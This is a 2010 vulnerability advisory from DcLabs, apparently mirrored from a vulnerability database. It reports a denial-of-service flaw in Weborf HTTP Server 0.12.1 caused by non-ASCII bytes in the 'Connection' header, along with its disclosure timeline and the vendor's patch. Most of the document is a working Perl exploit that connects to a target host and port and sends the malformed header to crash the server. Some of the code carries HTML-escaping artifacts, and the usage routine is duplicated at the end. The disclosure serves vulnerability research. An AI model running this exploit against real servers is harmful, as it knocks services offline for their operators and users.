Weborf DCA-00012 Vulnerability Report

2010-06-2300:00:00

vulners.com

JSON

[DCA-0012]

[Software]

Weborf HTTP Server

[Vendor Product Description]

Weborf is a lightweight Web server written in C. It supports IPv6
and basic authentication. It doesn't implement the full HTTP
specification, but can be used to easily share directories or files.

[Bug Description]

Weborf HTTP Server can't handle unicode characters in "Connection: "
general header-field leading to a Denial-of-Service flaw

[History]

Advisory sent to vendor on 06/21/2010.
Vendor reply 06/22/2010.
Vendor patch published 06/23/2010

[Impact]

[Affected Version]
-Weborf 0.12.1

Prior versions may also be vulnerable.

[Exploit]

#!/usr/bin/perl
use IO::Socket;

    if &#40;@ARGV &lt; 1&#41; {
            usage&#40;&#41;;
    }

    $ip     = $ARGV[0];
    $port   = $ARGV[1];

    print &quot;[+] Sending request...&#92;n&quot;;

    $socket = IO::Socket::INET-&gt;new&#40; Proto =&gt; &quot;tcp&quot;, PeerAddr =&gt;

"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
print $socket "GET / HTTP/1.0\r\n";
print $socket "Connection: ". "\0x99" x 4 ."\r\n\r\n";

    close&#40;$socket&#41;;

    print &quot;[+] Done!&#92;n&quot;;

sub usage() {
print "[-] Usage: <". $0 ."> <host> <port>\n";
print "[-] Example: ". $0 ." 127.0.0.1 80\n";
exit;
}

DcLabs Security Group
Sponsor: ipax
[email protected]

[Credits]
Crash and all DcLabs members.

JSON

Weborf DCA-00012 Vulnerability Report

sub usage() { print "[-] Usage: <". $0 ."> <host> <port>\n"; print "[-] Example: ". $0 ." 127.0.0.1 80\n"; exit; }

sub usage() {
print "[-] Usage: <". $0 ."> <host> <port>\n";
print "[-] Example: ". $0 ." 127.0.0.1 80\n";
exit;
}